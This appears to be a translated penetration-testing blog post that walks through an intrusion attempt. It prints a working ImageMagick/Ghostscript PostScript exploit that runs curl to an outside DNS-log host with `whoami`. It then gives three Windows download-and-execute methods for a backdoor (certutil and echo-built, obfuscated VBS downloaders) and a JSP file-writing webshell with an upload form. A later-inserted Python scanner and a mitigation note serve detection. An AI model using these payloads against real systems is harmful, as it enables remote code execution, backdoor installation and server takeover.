First, the ImageMagick vulnerability:
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%curl http://dnslog.cn/`whoami`)
currentdevice putdeviceprops
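As an added defensive example (not part of the original post), a Python check an upload handler could run before handing a file to ImageMagick's Ghostscript delegate: it flags the PostScript sandbox-bypass pattern shown above (the %pipe% output device, `setpagedevice undef`, and the save/restore trick). Both sample inputs are constructed, with the command replaced by a placeholder.

```python
import re

# Indicators of the Ghostscript sandbox-bypass pattern: drop setpagedevice,
# abuse save/restore, then point the output device at a %pipe% command.
SUSPICIOUS_TOKENS = {
    "pipe_device": re.compile(rb"%pipe%"),
    "output_file_redirect": re.compile(rb"/OutputFile\s*\("),
    "setpagedevice_undef": re.compile(rb"/setpagedevice\s+undef"),
    "putdeviceprops": re.compile(rb"\bputdeviceprops\b"),
    "restore_stopped": re.compile(rb"null\s+restore\s*\}\s*stopped"),
}

def looks_like_postscript(data: bytes) -> bool:
    """PostScript/EPS starts with '%!'; ImageMagick hands such content to
    Ghostscript based on the magic bytes, not the file extension."""
    return data.lstrip()[:32].startswith(b"%!")

def scan_upload(data: bytes) -> dict:
    """Verdict for an uploaded blob: which indicators matched and whether it
    should be quarantined before any image conversion runs."""
    hits = [name for name, pat in SUSPICIOUS_TOKENS.items() if pat.search(data)]
    is_ps = looks_like_postscript(data)
    # A %pipe% device or OutputFile redirect in PostScript is enough to block;
    # the remaining tokens are weaker and only count in combination.
    strong = "pipe_device" in hits or "output_file_redirect" in hits
    block = is_ps and (strong or len(hits) >= 3)
    return {"postscript": is_ps, "indicators": hits, "block": block}

# Constructed samples: the first mirrors the structure of the payload above
# (command replaced by a placeholder); the second is a harmless EPS stub.
MALICIOUS_SAMPLE = b"""%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%PLACEHOLDER_COMMAND)
currentdevice putdeviceprops
"""

BENIGN_SAMPLE = b"""%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: 0 0 100 100
newpath 10 10 moveto 90 90 lineto stroke
showpage
"""
```

String matching like this is only a detection signal, since PostScript can be obfuscated; the durable mitigation is to keep Ghostscript patched and to disable the PS, EPS, PDF and XPS coders in ImageMagick's policy.xml so untrusted uploads never reach the delegate.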
Then, on Windows, download the backdoor.
Method 1: certutil.exe -urlcache -split -f http://xxx/x.exe
Method 2:
echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >> downfile.vbs
cscript downfile.vbs http://xxx/x.exe D:\\1.exe
Method 3:
echo Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>download.vbs
echo Post.Open "GET","http://xxx/x.exe",0 >>download.vbs
echo Post.Send() >>download.vbs
echo Set aGet = CreateObject("ADODB.Stream") >>download.vbs
echo aGet.Mode = 3 >>download.vbs
echo aGet.Type = 1 >>download.vbs
echo aGet.Open() >>download.vbs
echo aGet.Write(Post.responseBody) >>download.vbs
echo aGet.SaveToFile "D:/a.exe",2 >>download.vbs
The download failed.
So write a JSP webshell via echo instead.
Remember to URL-encode it once.
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
<form method=post action="http://xxx/1.jsp">
<br><br>
<textarea name="t" rows=20 cols=120>你要提交到服务器的代码</textarea>
<br>
要保存成的文件名:<input name="f" size=30 value=shell.jsp>
<input type="submit" value=提交>
</form>
The ending is a classic.
A pure intranet with no outbound internet access. I was dumbfounded.